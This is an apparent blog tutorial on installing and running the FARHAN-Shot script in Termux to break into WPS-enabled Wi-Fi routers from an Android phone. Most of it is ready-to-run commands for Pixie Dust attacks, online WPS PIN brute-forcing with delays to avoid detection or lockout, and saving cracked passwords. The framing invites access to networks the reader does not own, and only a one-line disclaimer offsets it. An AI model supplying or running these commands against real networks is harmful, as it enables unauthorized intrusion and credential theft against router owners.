Getting into Wi-Fi networks can be important for many reasons, like checking security or connecting when you forget your password. If you have advanced skills and control over your Android device, the Termux app with the FARHAN-Shot script can help you do this.
The FARHAN-Shot script is a useful tool that helps find weaknesses in Wi-Fi networks, especially those that use WPS (Wi-Fi Protected Setup). It can perform different types of attacks, including the Pixie Dust attack, which works well on some routers.
By using the FARHAN-Shot script in Termux, you might be able to access Wi-Fi networks by taking advantage of WPS weaknesses, as long as you have the right permissions and knowledge.
WarningThis guide is intended for educational purposes only. Unauthorized access to networks is illegal and unethical.
Key Features of FARHAN-Shot
FARHAN-Shot is a great tool for testing Wi-Fi security. It works well on Android devices using Termux because it doesn't need to switch to monitor mode. Here are its main features:
-
Pixie Dust Attack (No Monitor Mode Needed)
The Pixie Dust attack is a fast way to break into WPS-enabled networks by taking advantage of weaknesses in the WPS system. Unlike other methods that need many attempts, Pixie Dust quickly gets the WPS key. Since it doesn't need monitor mode, it's easier to use on Android.
-
Built-in 3WiFi Offline WPS PIN Generator
FARHAN-Shot has a built-in tool to generate WPS PINs without needing the internet. This tool uses a database of known WPS PINs, making it easier to crack a router's security. This is helpful when:
- The router uses a weak or default WPS PIN.
- You want to try PINs without connecting to the router.
- You have limited internet access.
-
Online WPS
Bruteforce Attack
If the Pixie Dust attack doesn't work, FARHAN-Shot can try different WPS PINs online until it finds the right one. This method is good for:
- Routers that don’t limit PIN attempts.
- Testing specific networks.
- Finding out the default PIN for unknown networks.
Keep in mind, some routers may lock you out after too many failed attempts, so you may need to wait between tries.
-
Built-in Wi-Fi Scanner
FARHAN-Shot includes a Wi-Fi scanner that shows real-time information about nearby networks. It helps users:
- Find Wi-Fi networks, including those with WPS.
- Highlight networks based on their security status.
- Get important details like signal strength and encryption type.
This scanner makes it easier to find target networks without needing extra tools.
Requirements for FARHAN-Shot
Before installing and using FARHAN-Shot, ensure that your device certain requirements.
To run FARHAN-Shot smoothly, your system must have:
- Python 3.6 or above – Required for executing the script.
- WPA Supplicant – Essential for managing wireless connections.
- Pixiewps – A tool specifically designed for performing Pixie Dust attacks.
- iw – A command-line tool for managing wireless devices and scanning networks.
-
Root Access – FARHAN-Shot requires root privileges to interact with
the network interface.
If your Android device is not rooted, don’t worry—you can still use FARHAN-Shot by installing Kali NetHunter. NetHunter is a mobile penetration testing platform that provides a full Kali Linux environment on Android devices, including tools like Pixiewps and iw. This allows you to run Wi-Fi penetration tests without modifying your device’s system files.
How to Install FARHAN-Shot on Termux
Installing FARHAN-Shot is a straightforward process. You can either use a one-line installation command or manually install the required packages before running the tool.
One-Line Installation (Recommended)
To quickly install FARHAN-Shot and its dependencies, open Termux and run the following command:
apt update && apt upgrade && pkg install tsu && pkg install python && pkg install git && pkg install -y root-repo && pkg install -y git tsu python wpa-supplicant pixiewps iw openssl && git clone --depth 1 https://github.com/gtajisan/FARHAN-Shot FARHAN-Shot && termux-setup-storage && cd FARHAN-ShotThis command will:
- Update and upgrade Termux to ensure you have the latest packages.
- Install dependencies, including Python, Git, and necessary networking tools.
- Clone the FARHAN-Shot repository from GitHub.
- Set up Termux storage for proper functionality.
- Navigate to the FARHAN-Shot directory.
Manual Installation (Step-by-Step)
If you prefer to install everything manually, follow these steps:
Step 1: Install Required PackagesRun the following command to install all necessary dependencies:
pkg update && pkg upgrade && pkg install -y root-repo && pkg install -y git tsu python wpa-supplicant pixiewps iw openssl && termux-setup-storageAfter installing the required packages, download the FARHAN-Shot tool:
git clone --depth 1 https://github.com/Gtajisan/FARHAN-Shot.gitNavigate to the FARHAN-Shot directory and execute the script:
cd FARHAN-Shot && sudo python FARHAN-Shot.py -i wlan0 -KThis will launch the Pixie Dust attack using your wireless interface.
wlan0. If your device uses a different interface (e.g.,
wlan1 or eth0), replace wlan0 with the
correct interface name. To check your network interface, use the following
command in Termux:
iw devHow to Update FARHAN-Shot
To keep your tool updated with the latest features and fixes, run:
cd FARHAN-Shot && git pullThis command will pull the latest updates from the official GitHub repository.
With FARHAN-Shot installed and updated, you’re now ready to start Wi-Fi penetration testing.
How to Use FARHAN-Shot for Wi-Fi Penetration Testing
Once you have installed FARHAN-Shot, it's time to use its powerful features for Wi-Fi security testing. This section will guide you through the essential commands and attack methods supported by the tool.
Basic Usage
To run FARHAN-Shot, navigate to the installation directory and execute the script with the required arguments:
cd FARHAN-Shot && sudo python FARHAN-Shot.py -i wlan0 -KHere:
-
-i wlan0specifies the wireless interface used for the attack. -
-Kinitiates the Pixie Dust attack, which exploits vulnerabilities in WPS-enabled routers.
Scanning for Available Wi-Fi Networks
Before targeting a specific access point, you may want to scan nearby Wi-Fi networks:
cd FARHAN-Shot && sudo python FARHAN-Shot.py -i wlan0This command will list all detectable Wi-Fi networks along with their BSSID (MAC address), signal strength, and WPS status.
Performing a Pixie Dust Attack
The Pixie Dust attack is one of the most effective techniques for exploiting WPS vulnerabilities. To launch this attack on a specific target, use:
sudo python FARHAN-Shot.py -i wlan0 -b <BSSID> -K
Replace <BSSID> with the MAC address of
the target router.
Using the Integrated 3WiFi Offline WPS PIN Generator
FARHAN-Shot includes an offline WPS PIN generator using the 3WiFi database. This allows you to predict WPS PINs for certain routers without requiring an active connection.
To generate a PIN for a specific network, use:
sudo python FARHAN-Shot.py -i wlan0 --3wifiThis will attempt to retrieve a known WPS PIN for the target access point.
Running an Online WPS Bruteforce Attack
If the Pixie Dust attack fails, you can try an online WPS bruteforce attack, which systematically guesses the WPS PIN:
sudo python FARHAN-Shot.py -i wlan0 -b <BSSID> -BThis method can take longer but may be effective on WPS-enabled routers that do not have proper security measures.
Using the Wi-Fi Scanner with iw
FARHAN-Shot features an integrated Wi-Fi scanner that uses
iw for better performance. To scan for networks and highlight
WPS-enabled access points, run:
sudo python FARHAN-Shot.py -i wlan0 --scanThis provides a detailed network list with useful information such as encryption type, signal strength, and WPS status.
Advanced Script Options
FARHAN-Shot offers several advanced options to enhance Wi-Fi penetration testing. These options provide more control over attack methods, network scanning, and performance tuning.
Specifying a Custom WPS PIN
If you have a known or suspected WPS PIN for a network, you can manually specify it:
sudo python FARHAN-Shot.py -i wlan0 -b <BSSID> -p <WPS_PIN>Replace <WPS_PIN> with the actual 8-digit PIN.
Setting a Delay Between PIN Attempts
To reduce the chances of detection or lockout, you can introduce a delay between WPS PIN attempts:
sudo python FARHAN-Shot.py -i wlan0 -b <BSSID> -B -d 5This command sets a 5-second delay between each PIN attempt.
Saving Cracked Credentials
To save successful Wi-Fi credentials for future use, use the
-w option:
sudo python FARHAN-Shot.py -i wlan0 -b <BSSID> -K -wThe credentials will be stored in a file for later reference.
Forcing Pixiewps Bruteforce
If a router does not yield to the standard Pixie Dust attack, you can try forcing Pixiewps to run a full brute-force attack:
sudo python FARHAN-Shot.py -i wlan0 -b <BSSID> -K -FUse this option only when necessary, as it may take longer to complete.
Viewing the Exact Pixiewps Command
To see the exact command used by Pixiewps, use:
sudo python FARHAN-Shot.py -i wlan0 -b <BSSID> -K -XThis is useful for debugging and understanding how the attack is executed.
Using a Custom Vulnerability List
If you have a list of known vulnerable devices, you can specify it with:
sudo python FARHAN-Shot.py --vuln-list=my_vulnerable_routers.txtThis helps focus attacks on routers that are more likely to be compromised.
Automatically Disabling the Network Interface After Completion
To ensure the wireless interface resets properly after an attack, use:
sudo python FARHAN-Shot.py -i wlan0 --iface-downRunning the Script in a Loop
For continuous testing or automation, the script can be run in a loop:
sudo python FARHAN-Shot.py -i wlan0 -K -lThis makes the attack repeat until manually stopped.
Reversing the Scan Order
To scan networks in reverse order, use:
sudo python FARHAN-Shot.py -i wlan0 --reverse-scanActivating MediaTek Wi-Fi Interface Driver
For devices with MediaTek chipsets, enabling the correct Wi-Fi driver can prevent interface issues:
sudo python FARHAN-Shot.py -i wlan0 --mtk-wifiEnabling Verbose Mode
To get detailed output during the execution, use:
sudo python FARHAN-Shot.py -i wlan0 -vThis provides a real-time log of the attack process.
These advanced options make FARHAN-Shot a highly flexible and powerful tool for Wi-Fi penetration testing. Below is a summary:
| Option | Description |
|---|---|
-h, --help |
Show this help message and exit |
-i INTERFACE, --interface INTERFACE |
Name of the interface to use |
-b BSSID, --bssid BSSID |
BSSID of the target AP |
-p PIN, --pin PIN |
Use the specified pin (arbitrary string or 4/8 digit pin) |
-K, --pixie-dust |
Run Pixie Dust attack |
-F, --pixie-force |
Run Pixiewps with --force option (bruteforce full range) |
-X, --show-pixie-cmd |
Always print Pixiewps command |
-B, --bruteforce |
Run online bruteforce attack |
-d DELAY, --delay DELAY |
Set the delay between pin attempts |
-w, --write |
Write credentials to the file on success |
--iface-down |
Down network interface when the work is finished |
--vuln-list VULN_LIST |
Use custom file with vulnerable devices list |
-l, --loop |
Run in a loop |
-r, --reverse-scan |
Reverse order of networks in the list of networks. Useful on small displays |
-v, --verbose |
Verbose output |
Troubleshooting Common Issues
Even with proper setup and execution, you might encounter some issues while using FARHAN-Shot. Below are common errors and their solutions to help you resolve problems quickly.
Fixing "RTNETLINK Answers: Operation Not Possible Due to RF-Kill"
Issue:
If you see the error message above, it means the Wi-Fi interface has been soft-blocked, usually by a software switch.
Solution:
Unblock the Wi-Fi interface using the following command:
sudo rfkill unblock wifiThis command will remove the soft block, allowing you to proceed with penetration testing.
Dealing with "Device or Resource Busy (-16)" Error
Issue:
This error occurs when the Wi-Fi interface is still being used by another process, such as Network Manager.
Solution:
- First, disable Wi-Fi in your system settings.
- Then, terminate any conflicting processes.
- If the problem persists, try running the script with the interface down option:
sudo python FARHAN-Shot/FARHAN-Shot.py --iface-downHandling Disappearing wlan0 Interface on MediaTek Devices
Issue:
On certain Android devices with MediaTek SoCs, disabling Wi-Fi
might cause the wlan0 interface to disappear completely.
Solution:
To prevent this from happening, use the MediaTek Wi-Fi interface driver activation command:
sudo python FARHAN-Shot/FARHAN-Shot.py --mtk-wifi
This ensures the wlan0 interface remains active during
testing.
These troubleshooting tips should help resolve the most common issues users face when using FARHAN-Shot.
Usage Examples
Starting a Pixie Dust Attack
A Pixie Dust attack exploits vulnerabilities in the WPS (Wi-Fi Protected Setup) protocol to retrieve the WPS PIN and ultimately crack the Wi-Fi password.
Run the following command to initiate a Pixie Dust attack on a specific BSSID:
cd FARHAN-Shot && sudo python3 FARHAN-Shot.py -i wlan0 -b 00:90:4C:C1:AC:21 -K
Replace 00:90:4C:C1:AC:21 with the actual BSSID of the
target network.
Showing Available Networks and Starting a Pixie Dust Attack
If you want to scan for WPS-enabled networks before launching an attack, use this command:
cd FARHAN-Shot && sudo python3 FARHAN-Shot.py -i wlan0 -KThis will display a list of available networks and initiate the Pixie Dust attack on detected vulnerable targets.
Launching an Online WPS Bruteforce Attack
If you know part of the WPS PIN, you can use an online bruteforce attack to guess the remaining digits and gain access:
cd FARHAN-Shot && sudo python3 FARHAN-Shot.py -i wlan0 -b 00:90:4C:C1:AC:21 -B -p 1234
Replace 00:90:4C:C1:AC:21 with the BSSID of the target
network and 1234 with the known portion of the WPS PIN.
That's it, if you find a problem while using FARHAN-Shot, Please leave a comment below explaining what happened, and we will help you fix it! Your feedback also helps make the guide better for others.
